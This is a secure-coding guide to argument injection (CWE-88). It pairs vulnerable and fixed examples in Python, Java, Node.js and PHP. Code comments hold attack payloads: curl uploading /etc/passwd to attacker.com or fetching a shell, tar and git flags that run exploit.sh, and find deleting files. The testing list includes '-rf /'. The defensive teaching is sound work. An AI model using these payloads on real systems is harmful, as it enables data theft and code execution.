CWE-88: Argument Injection
Overview
Argument Injection occurs when untrusted user input is used to construct command-line arguments, function parameters, or system calls, allowing attackers to inject malicious arguments and alter program behavior.
Applications often call innocuous installed executables that can be subverted through command-line arguments to execute code or manipulate the filesystem. Such executables are known as LOLBins (living-off-the-land binaries).
OWASP Classification
A05:2025 - Injection
Risk
High: Attackers can alter command behavior, bypass security controls, access sensitive data, or escalate privileges by injecting unexpected arguments.
Remediation Steps
Core principle: Never allow untrusted input to be parsed as command options/flags; validate and place it after a flag terminator where supported.
Trace the Data Path
Analyze how untrusted data reaches command execution:
Review scan results:
- Source: Identify where untrusted data enters (user input, external files, databases, network requests)
- Argument Construction: Look for string concatenation or direct use in command arguments
- Sink: Locate command execution functions (system(), exec(), subprocess, Runtime.exec())
- Missing Validation: Identify gaps in input validation or parameterization
Find argument injection vulnerabilities proactively (good developer habits):
During development:
- Map all command executions: Identify every place your code invokes external programs (shell commands, system utilities, third-party binaries)
- Assume untrusted input is malicious: Any external input used in arguments could be an attack vector
- Understand flag behaviors: Know what dangerous flags each invoked program accepts (e.g., tar's --checkpoint-action, curl's --upload-file, git's --git-dir)
- Validate even with arrays: Using argument arrays prevents command injection but NOT argument injection; validation is still required
Code review checklist:
- Check all subprocess/exec calls: Does any user input reach command arguments?
- Look for flag injection: Can user input start with - or -- to inject flags?
- Verify allowlist validation: Are only expected values permitted, or just "no shell metacharacters"?
- Review argument order: Is user input placed where flags are allowed (dangerous) or only after the -- flag terminator?
- Check for option injection: Can attackers inject options like --option=value or -o value?
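The argument-order question can be illustrated with a stand-in program. The sketch below uses Python's argparse to play the role of a hypothetical CLI; the tool name fake_tool, its --output option, and the file names are assumptions made for illustration. It also assumes the invoked program honors the -- convention, which should be confirmed for each real program.

```python
import argparse

def parse_like_cli(argv):
    """Parse argv the way a typical option-parsing CLI would (hypothetical tool)."""
    parser = argparse.ArgumentParser(prog="fake_tool")
    parser.add_argument("--output", default="default.out")
    parser.add_argument("path")
    return parser.parse_args(argv)

user_input = "--output=/tmp/evil"

# Unsafe order: the input sits where options are parsed, so it is read as a flag.
unsafe = parse_like_cli([user_input, "report.txt"])

# Safe order: everything after "--" is positional, so the input stays data.
safe = parse_like_cli(["--", user_input])

print("unsafe output:", unsafe.output)
print("safe output:", safe.output, "| safe path:", safe.path)
```

In the unsafe call the attacker-chosen value overrides the output option even though an argument array was used; in the safe call the same string is treated as a path.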
Search your codebase for vulnerable patterns:
- Command execution with user input: subprocess.run([cmd, user_input]), exec(["command", req.params])
- String concatenation in arguments: ["tar", "-czf", "file_" + user_input]
- User input in first argument position: subprocess.run([user_input, arg2]) (extreme danger)
- Commands that accept dangerous flags: tar, curl, wget, git, rsync, find, ffmpeg
- Missing validation before argument arrays
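A rough way to search Python code for these patterns is to walk the syntax tree and report subprocess calls whose argument list is not made entirely of literals. This is a minimal sketch, not a replacement for a real static analyzer: the function name find_risky_calls is hypothetical, and it only recognizes calls written as subprocess.<function>(...) with a list as the first argument.

```python
import ast

EXEC_FUNCS = {"run", "call", "check_call", "check_output", "Popen"}

def find_risky_calls(source):
    """Return line numbers of subprocess calls whose argv has non-literal items."""
    risky = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        is_subprocess = (
            isinstance(func, ast.Attribute)
            and func.attr in EXEC_FUNCS
            and isinstance(func.value, ast.Name)
            and func.value.id == "subprocess"
        )
        if not is_subprocess or not node.args:
            continue
        argv = node.args[0]
        # A literal list of constants is fine; anything else needs review.
        if isinstance(argv, ast.List) and all(
            isinstance(item, ast.Constant) for item in argv.elts
        ):
            continue
        risky.append(node.lineno)
    return sorted(risky)

sample = '''
import subprocess
subprocess.run(["ls", "-l"])
subprocess.run(["tar", "-czf", "out.tgz", name])
subprocess.run(["tar", "-czf", "file_" + name])
'''
print(find_risky_calls(sample))
```

The reported lines are candidates for manual review, since a non-literal argument may still be validated elsewhere.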
Use development tools:
- Static analysis: Configure tools to flag subprocess/exec calls with non-constant arguments (Semgrep, CodeQL)
- IDE warnings: Set up custom inspections for command execution patterns
- Dependency scanning: Check if libraries invoke commands with user input (e.g., image processing, archive handling)
- Security linters: Add rules to detect missing validation before exec calls
Architectural best practices:
- Avoid executing external commands: Use native libraries instead (e.g., tarfile instead of the tar command, requests instead of curl)
- Constrain to specific commands: Don't allow user choice of which program to execute
- Use higher-level APIs: Libraries that abstract command execution with built-in validation
- Principle of least privilege: Run commands in restricted environments (containers, jails)
- Flag terminators: Place user input after -- to prevent flag injection: ["command", "--", user_input]
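As an illustration of the first practice, the sketch below builds a gzip-compressed archive with Python's standard tarfile module, so no external tar process parses the filename. The helper name create_archive and the temporary file layout are assumptions for the example.

```python
import tarfile
import tempfile
from pathlib import Path

def create_archive(archive_path, member_path):
    """Create a gzip-compressed tar archive without spawning the tar binary."""
    member = Path(member_path)
    with tarfile.open(archive_path, "w:gz") as archive:
        # arcname stores only the base name, not the full filesystem path.
        archive.add(member, arcname=member.name)

with tempfile.TemporaryDirectory() as workdir:
    # A name that the tar command would read as a flag is ordinary data here.
    odd_file = Path(workdir) / "--checkpoint=1"
    odd_file.write_text("harmless data")
    archive_file = Path(workdir) / "archive.tar.gz"
    create_archive(archive_file, odd_file)
    with tarfile.open(archive_file) as archive:
        names = archive.getnames()

print(names)
```

Because the filename never reaches a command line, there is no option parser for it to influence. Input validation is still worthwhile to keep files inside the intended directory.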
Use Parameterized APIs (Primary Defense)
Use APIs that separate commands from arguments:
- Use argument arrays: Pass arguments as separate elements, not concatenated strings
- Example (Python): subprocess.run(['ls', user_input]) instead of os.system('ls ' + user_input)
- Disable shell invocation: Use shell=False, UseShellExecute=false, etc.
- Never concatenate untrusted data into command strings
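Why this works: Each argument reaches the program as a separate value and no shell parses it, so shell metacharacters cannot alter the command structure. This stops command injection only; a value that begins with - can still be read as an option.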
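The effect of an argument array can be observed by launching a child process that prints what it received. In this sketch the child is the current Python interpreter, and the helper name echo_argv is hypothetical.

```python
import subprocess
import sys

def echo_argv(args):
    """Run a child Python process that prints the arguments it received."""
    child_code = "import sys; print(sys.argv[1:])"
    completed = subprocess.run(
        [sys.executable, "-c", child_code, *args],
        capture_output=True, text=True, check=True,
    )
    return completed.stdout.strip()

# Shell metacharacters arrive as literal text because no shell parses them.
received = echo_argv(["report.txt; whoami", "$(id)"])
print(received)
```

Both values arrive unchanged as two separate arguments, and neither whoami nor id is executed.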
Validate and Sanitize All Arguments
Even with parameterized APIs, validate untrusted data:
- Enforce strict validation: Define expected format using regex patterns
- Type checking: Ensure integers are integers, paths are valid paths, etc.
- Allowlist validation: Only permit known-good values
- Reject dangerous characters: Block ;, &, |, $, backticks, etc. (Note: this does not replace allowlist validation and should not be the primary defense.)
- Length limits: Prevent DoS with excessively long arguments
Common validation patterns:
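- Filenames: ^[a-zA-Z0-9._-]+$ (no path separators)
- Hostnames: ^[a-zA-Z0-9.-]+$
- Numbers: ^[0-9]+$
The filename and hostname patterns still accept a leading -, so also reject any value that starts with a dash.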
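The patterns above could be applied along these lines. This is a sketch under stated assumptions: the helper name is_valid and the 255-character default limit are illustrative choices, and fullmatch is used so that a trailing newline is not accepted.

```python
import re

FILENAME_RE = re.compile(r"[a-zA-Z0-9._-]+")
HOSTNAME_RE = re.compile(r"[a-zA-Z0-9.-]+")
NUMBER_RE = re.compile(r"[0-9]+")

def is_valid(value, pattern, max_length=255):
    """Allowlist check: bounded length, no leading dash, and a full match."""
    if not value or len(value) > max_length:
        return False
    if value.startswith("-"):
        return False
    # fullmatch closes the trailing-newline gap that "$" leaves with match().
    return pattern.fullmatch(value) is not None

checks = {
    "report-2024.txt": is_valid("report-2024.txt", FILENAME_RE),
    "--checkpoint=1": is_valid("--checkpoint=1", FILENAME_RE),
    "../etc/passwd": is_valid("../etc/passwd", FILENAME_RE),
    "example.com": is_valid("example.com", HOSTNAME_RE),
    "42": is_valid("42", NUMBER_RE),
}
print(checks)
```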
Apply Least Privilege
Limit damage if argument injection occurs:
- Run with minimal permissions: Don't run as root/Administrator
- Restrict command scope: Only allow necessary arguments
- Use containerization: Isolate processes with Docker/Kubernetes
- Apply OS-level restrictions: SELinux, AppArmor policies
Monitor and Log Command Execution
Enable detection and response:
- Log all command invocations with full arguments
- Alert on suspicious patterns: Unexpected arguments, special characters
- Monitor for failures: Track rejected/malformed arguments
- Review logs regularly: Identify attack attempts
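One possible shape for such logging is a thin wrapper around subprocess.run. The sketch below is an assumption-laden example: the logger name command_audit, the helper names, and the heuristic for "suspicious" arguments are all illustrative, and the heuristic is for alerting only, not a substitute for validation.

```python
import logging
import subprocess
import sys

logger = logging.getLogger("command_audit")

def looks_suspicious(arg):
    """Heuristic only: option-like prefix or shell metacharacters."""
    return arg.startswith("-") or any(ch in arg for ch in ";&|$`")

def run_logged(program_argv, user_args):
    """Log the full argv, warn on suspicious user-supplied values, then run."""
    full_argv = [*program_argv, *user_args]
    logger.info("exec argv=%r", full_argv)
    flagged = [arg for arg in user_args if looks_suspicious(arg)]
    if flagged:
        logger.warning("suspicious arguments=%r", flagged)
    return subprocess.run(full_argv, capture_output=True, text=True, check=False)

logging.basicConfig(level=logging.INFO)
# The child here is the current Python interpreter, used as a harmless stand-in.
result = run_logged([sys.executable, "-c", "print('ok')"], ["--checkpoint=1"])
print(result.stdout.strip())
```

Keeping program_argv and user_args separate lets the log show which values came from outside the application.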
Test with Malicious Inputs
Verify your fixes:
- Test with argument injection: --help, -rf /, ; whoami
- Test with special characters: ;, &, |, $, backticks
- Test encoding bypasses: URL-encoded, hex-encoded characters
- Ensure legitimate arguments still work correctly
- Re-scan with security scanner to confirm fix
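These checks can be scripted against whatever validator the application uses. The sketch below tests a hypothetical validator, accept_filename, which URL-decodes its input once before applying an allowlist; the payload lists are examples, not an exhaustive corpus.

```python
import re
from urllib.parse import unquote

SAFE_NAME = re.compile(r"[a-zA-Z0-9._-]+")

def accept_filename(raw_value):
    """Hypothetical validator under test: decode once, then allowlist-check."""
    value = unquote(raw_value)
    return (
        0 < len(value) <= 255
        and not value.startswith("-")
        and SAFE_NAME.fullmatch(value) is not None
    )

MALICIOUS = [
    "--help", "-rf /", "; whoami", "a|b", "$(id)", "`id`",
    "%2D%2Dhelp",      # URL-encoded "--help"
    "%3B%20whoami",    # URL-encoded "; whoami"
    "name\n",          # trailing newline
]
LEGITIMATE = ["report.txt", "backup_2024-01-01.tar.gz"]

rejected = [value for value in MALICIOUS if not accept_filename(value)]
accepted = [value for value in LEGITIMATE if accept_filename(value)]
print(len(rejected) == len(MALICIOUS), len(accepted) == len(LEGITIMATE))
```

Running both lists guards against the two failure modes: a fix that still lets payloads through, and a fix so strict that legitimate values stop working.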
Common Vulnerable Patterns
Each array element reaches the program as a single argument, so a payload containing spaces arrives as one value. The multi-token attack strings in the comments below apply as written only when the application splits input on whitespace or forwards several attacker-controlled values; a single value that begins with - can still be parsed as an option on its own.
Flag Injection in tar Command (Python)
import subprocess
from flask import Flask, request

app = Flask(__name__)

@app.route('/create-archive')
def create_archive():
    filename = request.args.get('file')
    # Uses argument array (prevents command injection)
    # BUT: still vulnerable to argument injection!
    subprocess.run(['tar', '-czf', 'archive.tar.gz', filename])
    # Attack: file=--checkpoint=1
    # Attack: file=--checkpoint-action=exec=sh exploit.sh
    # Result: tar executes exploit.sh during archive creation
    return "Archive created"
Flag Injection in curl Command (Java)
import java.io.IOException;

@PostMapping("/fetch-url")
public Response fetchUrl(@RequestParam String url) throws IOException {
    // Uses ProcessBuilder (prevents command injection)
    // BUT: vulnerable to argument injection via flags
    ProcessBuilder pb = new ProcessBuilder("curl", url);
    Process p = pb.start();
    // Attack: url=--upload-file /etc/passwd http://attacker.com
    // Result: curl uploads /etc/passwd to attacker server
    // Attack: url=-o /var/www/html/shell.php http://attacker.com/shell.txt
    // Result: curl downloads shell to web directory
    return Response.ok("Fetched");
}
Flag Injection in git Command (Node.js)
const { spawn } = require('child_process');

app.post('/clone-repo', (req, res) => {
  const repoUrl = req.body.repo;
  // Uses spawn with array (prevents command injection)
  // BUT: vulnerable to argument injection
  const git = spawn('git', ['clone', repoUrl]);
  // Attack: repo=--upload-pack=exploit.sh https://github.com/user/repo
  // Result: git executes exploit.sh during clone
  // Attack: repo=-c protocol.ext.allow=always [...]
  // Result: git config manipulation
  git.on('close', (code) => {
    res.send('Cloned');
  });
});
Flag Injection in ffmpeg Command (PHP)
<?php
$input = $_POST['input_file'];
$output = $_POST['output_file'];
// Builds an argument array, BUT implode() flattens it into one shell string
// escapeshellcmd() escapes shell metacharacters (blocks command injection),
// yet leaves spaces and dashes intact, so input can still add ffmpeg options
$cmd = ['ffmpeg', '-i', $input, $output];
exec(escapeshellcmd(implode(' ', $cmd)));
// Attack: input=-f lavfi -i nullsrc -t 1 output.mp4
// Result: ffmpeg ignores intended input, creates attacker-controlled output
// Attack: output=-f data - (outputs to stdout instead of file)
Flag Injection in find Command (Python)
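import subprocess
from flask import Flask, request

app = Flask(__name__)

@app.route('/search')
def search_files():
    pattern = request.args.get('pattern')
    # Uses argument array (prevents command injection)
    # BUT: the input is unvalidated and may carry find expressions
    result = subprocess.run(
        ['find', '/var/data', '-name', pattern],
        capture_output=True
    )
    # Attack: pattern=-exec rm -rf {} ;
    # Result: find executes rm on every file found
    # Attack: pattern=-delete (deletes all files)
    # Note: find reads the single argument after -name as the pattern, so these
    # payloads take effect only if the input is split into several arguments or
    # reaches an expression position (for example, the starting-path argument)
    return result.stdout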
Secure Patterns
Allowlist Validation with Flag Terminator for tar (Python)
import re
import subprocess
from flask import Flask, request, abort

app = Flask(__name__)
FILENAME_PATTERN = re.compile(r'^[a-zA-Z0-9_.-]+$')

@app.route('/create-archive')
def create_archive():
    filename = request.args.get('file', '')
    # Validate filename format; fullmatch() also rejects a trailing newline,
    # which match() with $ would accept
    if not FILENAME_PATTERN.fullmatch(filename):
        abort(400, "Invalid filename")
    # Ensure doesn't start with dash (no flags)
    if filename.startswith('-'):
        abort(400, "Filename cannot start with dash")
    # Additional length check
    if len(filename) > 255:
        abort(400, "Filename too long")
    # Use -- to terminate flags (defense in depth)
    subprocess.run(['tar', '-czf', 'archive.tar.gz', '--', filename],
                   check=True)
    return "Archive created"
Why this works:
- Allowlist validation: Regex pattern restricts filenames to alphanumeric characters, underscores, dots, and dashes, so shell metacharacters and path separators are rejected. The pattern itself permits a leading dash, which the next check handles.
- Dash prefix check: Explicitly rejects filenames starting with - to prevent flag injection like --checkpoint-action=exec=malicious.sh
- Length validation: Prevents DoS attacks with excessively long argument strings that could cause resource exhaustion
- Flag terminator (--): The -- argument tells tar to treat all subsequent arguments as filenames, not flags (defense in depth)
- Subprocess array: Using subprocess.run() with an array prevents command injection by not invoking a shell interpreter
URL Validation with Domain Allowlist for curl (Java)
import java.io.IOException;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.Set;
import java.util.regex.Pattern;

private static final Pattern URL_PATTERN =
    Pattern.compile("^https?://[a-zA-Z0-9.-]+(/[a-zA-Z0-9._/-]*)?$");

@PostMapping("/fetch-url")
public Response fetchUrl(@RequestParam String url) throws IOException {
    // Validate URL format
    if (!URL_PATTERN.matcher(url).matches()) {
        throw new BadRequestException("Invalid URL format");
    }
    // Parse and validate URL
    try {
        URL parsedUrl = new URL(url);
        // Validate scheme
        if (!parsedUrl.getProtocol().equals("https")) {
            throw new BadRequestException("Only HTTPS URLs allowed");
        }
        // Validate domain allowlist
        Set<String> allowedDomains = Set.of("api.example.com", "cdn.example.com");
        if (!allowedDomains.contains(parsedUrl.getHost())) {
            throw new BadRequestException("Domain not allowed");
        }
    } catch (MalformedURLException e) {
        throw new BadRequestException("Invalid URL");
    }
    // Better: use Java HTTP client instead of curl
    // HttpClient client = HttpClient.newHttpClient();
    // HttpResponse<String> response = client.send(request, BodyHandlers.ofString());
    // If you must use curl, ensure no flags
    if (url.startsWith("-")) {
        throw new BadRequestException("Invalid URL");
    }
    // "--" ends option parsing, so the URL cannot be read as a flag
    ProcessBuilder pb = new ProcessBuilder("curl", "--", url);
    Process p = pb.start();
    return Response.ok("Fetched");
}
Why this works:
- URL parsing: Java's URL class validates URL structure and prevents malformed URLs that could inject flags
- Protocol allowlist: Restricts to HTTPS only, preventing dangerous protocols like file://, gopher://, or dict:// that could be exploited
- Domain allowlist: Only allows specific trusted domains, preventing attackers from using flags like --upload-file to exfiltrate data to attacker servers
- Dash prefix validation: Ensures URL doesn't start with - to block flag injection attempts like -o /path/to/shell.php
- Native HTTP client alternative: Comment suggests using Java's HttpClient instead of shelling out to curl, eliminating argument injection entirely
Repository URL Validation with Host Allowlist for git (Node.js)
const { spawn } = require('child_process');
const { URL } = require('url');

const ALLOWED_GIT_HOSTS = ['github.com', 'gitlab.com'];

app.post('/clone-repo', (req, res) => {
  const repoUrl = req.body.repo;
  // Parse and validate URL
  let parsedUrl;
  try {
    parsedUrl = new URL(repoUrl);
  } catch (e) {
    return res.status(400).send('Invalid URL');
  }
  // Validate protocol
  if (parsedUrl.protocol !== 'https:') {
    return res.status(400).send('Only HTTPS URLs allowed');
  }
  // Validate host allowlist
  if (!ALLOWED_GIT_HOSTS.includes(parsedUrl.hostname)) {
    return res.status(400).send('Git host not allowed');
  }
  // Ensure URL doesn't start with dash
  if (repoUrl.startsWith('-')) {
    return res.status(400).send('Invalid URL format');
  }
  // Validate path format
  if (!/^\/[a-zA-Z0-9_-]+\/[a-zA-Z0-9_-]+(\.git)?$/.test(parsedUrl.pathname)) {
    return res.status(400).send('Invalid repository path');
  }
  // Use -- to terminate flags
  const git = spawn('git', ['clone', '--', repoUrl], {
    timeout: 30000, // Prevent DoS
    shell: false
  });
  git.on('close', (code) => {
    if (code === 0) {
      res.send('Cloned');
    } else {
      res.status(500).send('Clone failed');
    }
  });
});
Why this works:
- URL parsing: Node.js URL class validates structure and prevents malformed URLs that could inject git flags
- Protocol restriction: Only HTTPS allowed, preventing git:// or ext:: protocols that can execute arbitrary commands
- Host allowlist: Restricts to trusted git hosting providers, preventing injection attacks like --upload-pack=exploit.sh
- Path validation: Regex ensures repository path follows expected format (/user/repo), blocking unusual paths that could contain flags
- Timeout protection: 30-second timeout prevents DoS attacks with slow or hanging clone operations
Filename Validation with Path Construction for ffmpeg (PHP)
<?php
// Validate input filename
$input = $_POST['input_file'] ?? '';
if (!preg_match('/^[a-zA-Z0-9_.-]+$/', $input)) {
    http_response_code(400);
    die('Invalid input filename');
}
if ($input[0] === '-') {
    http_response_code(400);
    die('Filename cannot start with dash');
}
// Validate output filename
$output = $_POST['output_file'] ?? '';
if (!preg_match('/^[a-zA-Z0-9_.-]+\.(mp4|webm|avi)$/', $output)) {
    http_response_code(400);
    die('Invalid output filename');
}
if ($output[0] === '-') {
    http_response_code(400);
    die('Filename cannot start with dash');
}
// Construct full paths
$base_input_dir = '/var/app/uploads/';
$base_output_dir = '/var/app/converted/';
$input_path = $base_input_dir . $input;
$output_path = $base_output_dir . $output;
// Verify input file exists
if (!file_exists($input_path) || !is_file($input_path)) {
    http_response_code(404);
    die('Input file not found');
}
// ffmpeg has no -- option terminator; the absolute paths built above
// start with /, so they cannot be parsed as options
$cmd = [
    'ffmpeg',
    '-i', $input_path,
    $output_path
];
// exec() passes the string to a shell, so quote each argument separately
$result = null;
$output_lines = [];
exec(implode(' ', array_map('escapeshellarg', $cmd)), $output_lines, $result);
if ($result !== 0) {
    http_response_code(500);
    die('Conversion failed');
}
echo 'Converted successfully';
Why this works:
- Allowlist validation: Regex restricts filenames to safe characters (alphanumeric, underscore, dot, dash) preventing flag injection and path traversal
- Extension validation: Output filename must match allowed video formats (mp4, webm, avi), preventing attackers from creating arbitrary file types
- Dash prefix check: Explicitly blocks filenames starting with - to prevent flags like -f data - that could redirect output
- Full path construction: Prepending trusted base directories prevents path traversal and confines files to expected locations
- File existence verification: Validates input file exists before processing, preventing ffmpeg errors and resource waste
Pattern Validation with Native Alternative for find (Python)
import re
import subprocess
from flask import Flask, request, abort

app = Flask(__name__)
FILENAME_PATTERN = re.compile(r'^[a-zA-Z0-9_.*?]+$')  # Allow wildcards

@app.route('/search')
def search_files():
    pattern = request.args.get('pattern', '')
    # Validate pattern format (fullmatch also rejects a trailing newline)
    if not FILENAME_PATTERN.fullmatch(pattern):
        abort(400, "Invalid search pattern")
    # Reject if starts with dash (flag injection)
    if pattern.startswith('-'):
        abort(400, "Pattern cannot start with dash")
    # Limit pattern length
    if len(pattern) > 100:
        abort(400, "Pattern too long")
    # Better: use Python's glob or pathlib instead of find command
    # from pathlib import Path
    # matches = Path('/var/data').glob(pattern)  # use rglob() to recurse like find
    # If you must use find, pass the validated pattern directly after -name;
    # find does not accept -- between -name and its pattern
    result = subprocess.run(
        ['find', '/var/data', '-name', pattern],
        capture_output=True,
        timeout=10,  # Prevent DoS
        check=False
    )
    return result.stdout
Why this works:
- Pattern allowlist: Regex limits search patterns to alphanumeric characters and wildcards (*, ?), blocking dangerous flags like -exec or -delete
- Dash prefix validation: Explicitly rejects patterns starting with - to prevent flag injection that could execute arbitrary commands
- Length restriction: 100-character limit prevents DoS attacks with extremely long patterns that could cause resource exhaustion
- Native alternative recommended: Comment suggests using Python's pathlib.glob() instead of shelling out to find, eliminating argument injection entirely
- Timeout protection: 10-second timeout prevents hanging or slow operations from consuming server resources